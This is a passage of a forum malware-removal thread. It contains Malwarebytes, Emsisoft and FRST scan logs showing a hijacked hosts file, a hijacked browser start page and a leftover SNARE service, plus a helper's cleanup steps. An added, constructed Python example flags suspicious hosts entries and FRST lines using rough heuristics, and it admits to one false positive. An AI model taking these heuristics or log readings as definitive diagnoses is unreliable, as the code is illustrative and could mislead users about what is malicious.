# This is a sample HOSTS file used by M) Good: () -> Replace on reboot. [c7b02ccad9cfae88c23fe7ab19e719e7]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (
#    
# This is a sample HOSTS file used B) Good: () -> Replace on reboot. [fa7dd91d5c4c70c6bf42bfd329d76c94]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (soft Corp.    
#    
# This is a sample HOSTS file used by) Good: () -> Replace on reboot. [314633c3d4d4d56130d1a2f02fd16a96]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (
#    
# This is a sample HOSTS file used by Microsof) Good: () -> Replace on reboot. [e79036c0e9bf69cd3ac77a18cc349c64]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (.    
#    
# This is a sample HOSTS file used ) Good: () -> Replace on reboot. [87f036c07533cf67d62bdeb4817fa65a]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (oft Corp.    
#    
# This is a sample HOSTS) Good: () -> Replace on reboot. [cfa810e61791bd79f20f9af853ad7b85]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (rosoft Corp.    
#    
# This is a sample HOST) Good: () -> Replace on reboot. [c3b41cda04a4a096a75a038ffe0245bb]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (rosoft Corp.    
#    
# This is a sample HOSTS fil) Good: () -> Replace on reboot. [33440de92b7dfb3bcb364f438a760cf4]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (Corp.    
#    
# This is a sample HOSTS file used ) Good: () -> Replace on reboot. [086f7482822653e33ec32c66c739f50b]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (ft Corp.    
#    
# This is a sample HOSTS file used) Good: () -> Replace on reboot. [e5925c9a4860a096b44d048efe020ff1]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (rp.    
#    
# This is a sample HOSTS file) Good: () -> Replace on reboot. [0f680fe71a8eb48220e1a3ef53adba46]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (crosoft Corp.    
#    
# This is a sample HOST) Good: () -> Replace on reboot. [1d5a797deeba6ec89f6241513bc5ff01]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (oft Corp.    
#    
# This is a sample HOSTS file used ) Good: () -> Replace on reboot. [344382743f6977bf1fe2880a0ef21de3]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (Corp.    
#    
# This is a sample HOSTS file used by Mi) Good: () -> Replace on reboot. [d2a516e0387053e3d42d583a4bb552ae]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (    
#    
# This is a sample HOSTS file used by Microso) Good: () -> Replace on reboot. [45329363297f231350b14a48d03014ec]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (    
#    
# This is a sample HOSTS file used by ) Good: () -> Replace on reboot. [90e7f9fde9bf8caa99684d45fc048d73]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (t Corp.    
#    
# This is a sample HOSTS file used by Mic) Good: () -> Replace on reboot. [33440fe73e6ab6801ce51f73c04034cc]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (#    
# This is a sample HOSTS file used by Mi) Good: () -> Replace on reboot. [7afd787e05a3e25404fddeb479874eb2]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (rp.    
#    
# This is a sample HOSTS file used by M) Good: () -> Replace on reboot. [6f084ea8a10754e210f190026e929967]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (rp.    
#    
# This is a sample HOSTS file us) Good: () -> Replace on reboot. [c0b736c03474d75f23de9bf7aa56fd03]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (orp.    
#    
# This is a sample HOSTS file us) Good: () -> Replace on reboot. [403723d3b1f763d35fa2870ba060d729]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (rosoft Corp.    
#    
# This is a sample HOSTS file) Good: () -> Replace on reboot. [aacdfafca602f2447d84f39fc23e58a8]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (soft Corp.    
#    
# This is a sample HOSTS file used) Good: () -> Replace on reboot. [22557b7b3a6e8caa7a871f7305fb52ae]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (.    
#    
# This is a sample HOSTS file used by Mi) Good: () -> Replace on reboot. [037423d351574aecc33e6b27da264db3]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: ( Corp.    
#    
# This is a sample HOSTS file u) Good: () -> Replace on reboot. [05724da963454beb11f06b2745bb619f]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (.    
#    
# This is a sample HOSTS file used by Micro) Good: () -> Replace on reboot. [80f744b28f19b38308f93260b749827e]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (.    
#    
# This is a sample HOSTS file used B) Good: () -> Replace on reboot. [cbac53a3c4e4d561a55c108212eef30d]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (Corp.    
#    
# This is a sample HOSTS file ) Good: () -> Replace on reboot. [24538670941434028879652d33cd40c0]

Physical Sectors Detected: 0
(No malicious items detected)

(end)
 

******************************************************************************

 

My computer is just the same. It wasn't slow even with this malware or virus. I guess running Malwarebytes Anti-Malware daily somewhat helps... But I know that these unwanted software/programs need to go away for good. I was already considering making a full reformat when I stumbled on Sam's post. I'm glad I did.

Anyway, let me know what to do next.

Thank you again.



#4 palaboyako

palaboyako
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:10:01 AM

Posted 28 April 2017 - 11:47 AM

Just in case, I have attached the files as well.

Many thanks :-)

Attached Files



#5 palaboyako

palaboyako
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:10:01 AM

Posted 28 April 2017 - 11:52 AM

Also, I have been checking Task Manager and I can no longer see SNARE and Kitty. I hope they are gone for good. :-)



#6 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:09:01 PM

Posted 28 April 2017 - 12:13 PM

1.
Emsisoft Emergency Kit
  • Click here to download Emsisoft Emergency Kit. The download will automatically start after a moment.
  • Save EmsisoftEmergencyKit.exe to your Desktop.
  • Double click on EmsisoftEmergencyKit.exe (Windows Vista/7/8 users: Accept UAC warning if it is enabled).
  • Leave everything as it is, then click Extract. This will unpack Emsisoft Emergency Kit to the EEK folder located in the root drive (usually C:\).
  • Once the extraction is done, an icon will appear on your Desktop. Double click it to start Emsisoft Emergency Kit.
  • Wait for Emsisoft Emergency Kit to finish loading signatures.
  • Choose Yes, then wait for EEK to finish updating.
  • Choose Malware Scan under the Scan button. When EEK asks to activate PUP detection, choose Yes.
  • Wait for the scan to finish.
  • If EEK detects something, all detected items will be displayed. Place a checkmark before everything, then choose Quarantine Selected.
  • If Emsisoft Emergency Kit asks to reboot, please do so immediately.
  • The scan log is located in Logs -> Scan Logs. Click on the entry of the latest scan, choose Export and save the report on your Desktop.
  • Please Copy and Paste the contents of the scan log in your next reply.
2.
Please run FRST again and post the new FRST .txt



Is the computer showing any signs of malware now?

" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


If I have helped you, consider making a donation to help me continue the fight against Malware!


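The two artifact types this thread turns on are a hijacked hosts file (MBAR's Hijack.HostFile detections above; FRST later reports "There are more than one entry in Hosts") and FRST Services/Run lines whose binary is missing or lives under a user profile (the `S2 SNARE; C:\Users\...\Snare.dll [X]` entry). The following is an added example for this thread, not code from FRST, MBAR, EEK or either poster: it parses a hosts file the way the resolver does (everything after `#` ignored) and flags every active mapping that is not a plain loopback-to-localhost line, then scores FRST Services/Drivers/Run lines. The hosts sample is constructed (placeholder `.invalid` names, since the thread never shows the real hijack entries); the FRST sample lines are copied from the FRST.txt posted below. One assumption about FRST's output format: a Run line with no `[size date]` block is treated as FRST not having found the file, which is how the BlueStacks Agent entry reads.

```python
"""Offline triage of a Windows hosts file and FRST Services/Run lines.
Added example for this thread; not part of FRST, MBAR or EEK."""
import re
from dataclasses import dataclass, field

# A stock Windows hosts file is comments only. These are the only active
# mappings that commonly appear in a clean file and are not worth flagging.
LOOPBACK = {"127.0.0.1", "::1"}
DEFAULT_HOSTNAMES = {"localhost", "localhost.localdomain", "broadcasthost"}


def suspicious_hosts_entries(hosts_text):
    """Return (ip, hostname) pairs that are active (not commented out) and are
    not a loopback -> localhost mapping. The resolver ignores everything after
    '#', so the stock header lines never count."""
    findings = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        ip, names = parts[0], parts[1:]
        for name in names:
            if ip in LOOPBACK and name.lower() in DEFAULT_HOSTNAMES:
                continue
            findings.append((ip, name.lower()))
    return findings


# FRST line shapes (see the FRST.txt in this thread):
#   S2 SNARE; C:\Users\palaboy\AppData\Local\SNARE\Snare.dll [X]
#   R2 avgsvc; C:\...\avgsvca.exe [1428680 2017-03-23] (AVG Technologies CZ, s.r.o.)
#   HKLM\...\Run: [AvgUi] => C:\...\avguirna.exe [239104 2017-03-23] (AVG ...)
_TAIL = r"(?:\s+\[(?P<meta>[^\]]*)\])?(?:\s+\((?P<publisher>[^)]*)\))?\s*$"
FRST_SERVICE_RE = re.compile(r"^(?P<state>[RSU]\d)\s+(?P<name>[^;]+);\s+(?P<path>.+?)" + _TAIL)
FRST_RUN_RE = re.compile(r"^(?P<hive>HK\S*?)\\Run: \[(?P<name>[^\]]*)\] => (?P<path>.+?)" + _TAIL)
USER_PROFILE_RE = re.compile(r"^[A-Za-z]:\\Users\\", re.IGNORECASE)


@dataclass
class Finding:
    kind: str              # "service" (also drivers) or "run"
    name: str
    path: str
    reasons: list = field(default_factory=list)


def triage_frst_lines(lines):
    """Return a Finding for each recognised line that has at least one reason
    to look closer; lines with a found, published file are left alone."""
    findings = []
    for line in lines:
        kind, m = "service", FRST_SERVICE_RE.match(line)
        if not m:
            kind, m = "run", FRST_RUN_RE.match(line)
        if not m:
            continue
        path, meta, publisher = m["path"], m["meta"], m["publisher"]
        reasons = []
        if meta is None or meta == "X":
            # Assumption: FRST prints [size date] only when it found the file.
            reasons.append("no size/date recorded: FRST did not find the file")
        elif not (publisher or "").strip():
            reasons.append("no publisher in the file's version info")
        if USER_PROFILE_RE.match(path):
            reasons.append("binary lives under C:\\Users, not an install location")
        if kind == "service" and path.lower().endswith(".dll"):
            reasons.append("service path is a DLL rather than an .exe/.sys")
        if reasons:
            findings.append(Finding(kind, m["name"].strip(), path, reasons))
    return findings


# Constructed sample: stock header plus three lines a hijacker might add.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
#      102.54.94.97     rhino.acme.com          # source server
#      127.0.0.1       localhost
127.0.0.1       localhost
0.0.0.0         update.example.invalid
127.0.0.1       www.example.invalid  cdn.example.invalid
"""

# Lines copied from the FRST.txt posted in this thread.
SAMPLE_FRST = [
    r"R2 AVG Antivirus; C:\Program Files (x86)\AVG\Antivirus\AVGSvc.exe [262696 2017-04-12] (AVG Technologies CZ, s.r.o.)",
    r"S2 SNARE; C:\Users\palaboy\AppData\Local\SNARE\Snare.dll [X]",
    r"U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [28272 2017-04-28] ()",
    r"HKLM\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [239104 2017-03-23] (AVG Technologies CZ, s.r.o.)",
    r"HKU\S-1-5-21-3175129382-567401783-3479919610-1001\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe",
]

if __name__ == "__main__":
    for ip, name in suspicious_hosts_entries(SAMPLE_HOSTS):
        print(f"hosts: {ip} -> {name}")
    for f in triage_frst_lines(SAMPLE_FRST):
        print(f"{f.kind}: {f.name} ({f.path}) :: " + "; ".join(f.reasons))
```

Run against the sample it reports the three constructed hosts mappings and three FRST lines: SNARE (missing file, under a user profile, DLL as a service), TrueSight (no publisher; that one is RogueKiller's own driver, which is why a human still reviews the list) and the BlueStacks Agent Run entry (no file metadata). The AVG lines are not reported. On a live box, feed it the real `C:\Windows\System32\drivers\etc\hosts` and the Services/Drivers/Registry sections of FRST.txt.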
#7 palaboyako

palaboyako
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:10:01 AM

Posted 28 April 2017 - 12:53 PM

EEK Scan:

 

Emsisoft Emergency Kit - Version 2017.2
Scan log

Date                   Scan Method   Objects Scanned   Objects Detected   Duration   Type          Computer Name
29/04/2017 1:40:12 AM  Malware       77139             2                  0:03:54    Manual scan   WIN10
 

 

*****************************************************************************************************************************

 

FRST.txt

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 27-04-2017
Ran by palaboy (administrator) on WIN10 (29-04-2017 01:46:09)
Running from C:\Users\palaboy\Downloads\Programs
Loaded Profiles: palaboy (Available Profiles: palaboy)
Platform: Windows 10 Pro Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Antivirus\AVGSvc.exe
(Intel Corporation) C:\Windows\SysWOW64\IntelCpHeciSvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Antivirus\x64\aswidsagenta.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avguix.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
(Facebook) C:\Users\palaboy\AppData\Local\Facebook\Games\FacebookGameroom.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(The CefSharp Authors) C:\Users\palaboy\AppData\Local\Facebook\Games\Facebook Gameroom Browser.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
(Emsisoft Ltd) C:\EEK\bin64\a2emergencykit.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [239104 2017-03-23] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [AVGUI.exe] => C:\Program Files (x86)\AVG\Antivirus\AvLaunch.exe [263088 2017-04-12] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [Malwarebytes' Anti-Malware] => C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe [462408 2012-04-04] (Malwarebytes Corporation)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-03-15] (Oracle Corporation)
HKU\S-1-5-21-3175129382-567401783-3479919610-1001\...\Run: [Lync] => C:\Program Files\Microsoft Office\Office16\lync.exe [26991304 2017-03-15] (Microsoft Corporation)
HKU\S-1-5-21-3175129382-567401783-3479919610-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [53123712 2016-05-17] (Skype Technologies S.A.)
HKU\S-1-5-21-3175129382-567401783-3479919610-1001\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
HKU\S-1-5-21-3175129382-567401783-3479919610-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [4014136 2017-04-27] (Tonec Inc.)
ShellIconOverlayIdentifiers: [   IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2015-08-14] (Tonec Inc.)
Startup: C:\Users\palaboy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Facebook Gameroom.lnk [2017-04-14]
ShortcutTarget: Facebook Gameroom.lnk -> C:\Users\palaboy\AppData\Local\Facebook\Games\FacebookGameroom.exe (Facebook)
Startup: C:\Users\palaboy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2016-10-08]
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{63d9886c-e056-4db5-92b9-677a71eb9bf8}: [DhcpNameServer] 192.168.1.1
ManualProxies:

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://ph.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wcg_chtengin_17_15&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dph%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyEtDzz0DyD0C0C0D0DtCzyyC0AtB0C0FtN0D0Tzu0StCzytByBtN1L2XzutAtFtBzytFtAtFyDtBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StCzy0AzzzztCzz0EtGtB0CyDyBtGtC0FtD0BtGtB0BtByEtGyEzzyCyBtD0CyEyC0CzztDyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0BzzyE0FyCtCtAtG0D0EtAyDtGyEtD0DtAtG0BtA0FyEtGyE0AyD0B0CzzyE0C0Ezz0BtD2QtN0A0LzutB%26cr%3D863634034%26a%3Dwcg_chtengin_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2016-12-11] (Internet Download Manager, Tonec Inc.)
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2017-03-14] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2017-02-22] (Microsoft Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2016-12-11] (Internet Download Manager, Tonec Inc.)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\ssv.dll [2017-04-28] (Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2017-02-22] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\jp2ssv.dll [2017-04-28] (Oracle Corporation)
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2016-11-16] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2016-11-16] (Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2016-11-16] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2016-11-16] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

Edge:
======
Edge HomeButtonPage: HKU\S-1-5-21-3175129382-567401783-3479919610-1001 -> hxxp://www.google.com

FireFox:
========
FF DefaultProfile: iuxxj1ya.default-1493381789762
FF ProfilePath: C:\Users\palaboy\AppData\Roaming\Mozilla\Firefox\Profiles\iuxxj1ya.default-1493381789762 [2017-04-29]
FF HKU\S-1-5-21-3175129382-567401783-3479919610-1001\...\Firefox\Extensions: [mozilla_cc3@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi
FF Extension: (No Name) - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi [2017-04-26]
FF HKU\S-1-5-21-3175129382-567401783-3479919610-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\palaboy\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\palaboy\AppData\Roaming\IDM\idmmzcc5 [2017-04-28] [not signed]
FF HKU\S-1-5-21-3175129382-567401783-3479919610-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2017-01-26]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_148.dll [2017-04-12] ()
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.2 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-01-20] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_148.dll [2017-04-12] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.131.2 -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\dtplugin\npDeployJava1.dll [2017-04-28] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.131.2 -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\plugin2\npjp2.dll [2017-04-28] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-01-12] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-02-18] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3175129382-567401783-3479919610-1001: @citrixonline.com/appdetectorplugin -> C:\Users\palaboy\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2016-07-08] (Citrix Online)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2016-01-12] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2017-02-18] (Adobe Systems Inc.)

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2017-04-27]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AVG Antivirus; C:\Program Files (x86)\AVG\Antivirus\AVGSvc.exe [262696 2017-04-12] (AVG Technologies CZ, s.r.o.)
R3 avgbIDSAgent; C:\Program Files (x86)\AVG\Antivirus\x64\aswidsagenta.exe [7448992 2017-04-12] (AVG Technologies CZ, s.r.o.)
R2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1428680 2017-03-23] (AVG Technologies CZ, s.r.o.)
S3 cplspcon; C:\Windows\system32\IntelCpHDCPSvc.exe [480224 2016-11-01] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [341984 2016-11-01] (Intel Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [654408 2012-04-04] (Malwarebytes Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
S2 SNARE; C:\Users\palaboy\AppData\Local\SNARE\Snare.dll [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 avgbdisk; C:\Windows\system32\drivers\avgbdiska.sys [166136 2017-04-12] (AVG Technologies CZ, s.r.o.)
R1 avgbidsdriver; C:\Windows\system32\drivers\avgbidsdrivera.sys [310056 2017-04-12] (AVG Technologies CZ, s.r.o.)
R0 avgbidsh; C:\Windows\system32\drivers\avgbidsha.sys [192096 2017-04-12] (AVG Technologies CZ, s.r.o.)
R0 avgblog; C:\Windows\system32\drivers\avgbloga.sys [336408 2017-04-12] (AVG Technologies CZ, s.r.o.)
R0 avgbuniv; C:\Windows\system32\drivers\avgbuniva.sys [50848 2017-04-12] (AVG Technologies CZ, s.r.o.)
S3 avgHwid; C:\Windows\system32\drivers\avgHwid.sys [39288 2017-04-12] (AVG Technologies CZ, s.r.o.)
R2 avgMonFlt; C:\Windows\system32\drivers\avgMonFlt.sys [129776 2017-04-28] (AVG Technologies CZ, s.r.o.)
R1 avgRdr; C:\Windows\system32\drivers\avgRdr2.sys [102136 2017-04-12] (AVG Technologies CZ, s.r.o.)
R0 avgRvrt; C:\Windows\system32\drivers\avgRvrt.sys [76688 2017-04-12] (AVG Technologies CZ, s.r.o.)
R1 avgSnx; C:\Windows\system32\drivers\avgSnx.sys [1006040 2017-04-12] (AVG Technologies CZ, s.r.o.)
R1 avgSP; C:\Windows\system32\drivers\avgSP.sys [557912 2017-04-28] (AVG Technologies CZ, s.r.o.)
R2 avgStm; C:\Windows\system32\drivers\avgStm.sys [165048 2017-04-12] (AVG Technologies CZ, s.r.o.)
R0 avgVmm; C:\Windows\system32\drivers\avgVmm.sys [340688 2017-04-12] (AVG Technologies CZ, s.r.o.)
R1 epp; C:\EEK\bin64\epp.sys [124552 2016-11-23] (Emsisoft Ltd)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-01-21] (REALiX™)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [24904 2012-04-04] (Malwarebytes Corporation)
S3 ptun0901; C:\Windows\System32\drivers\ptun0901.sys [27136 2016-04-21] (The OpenVPN Project)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2015-10-30] (Realtek                                            )
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [28272 2017-04-28] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
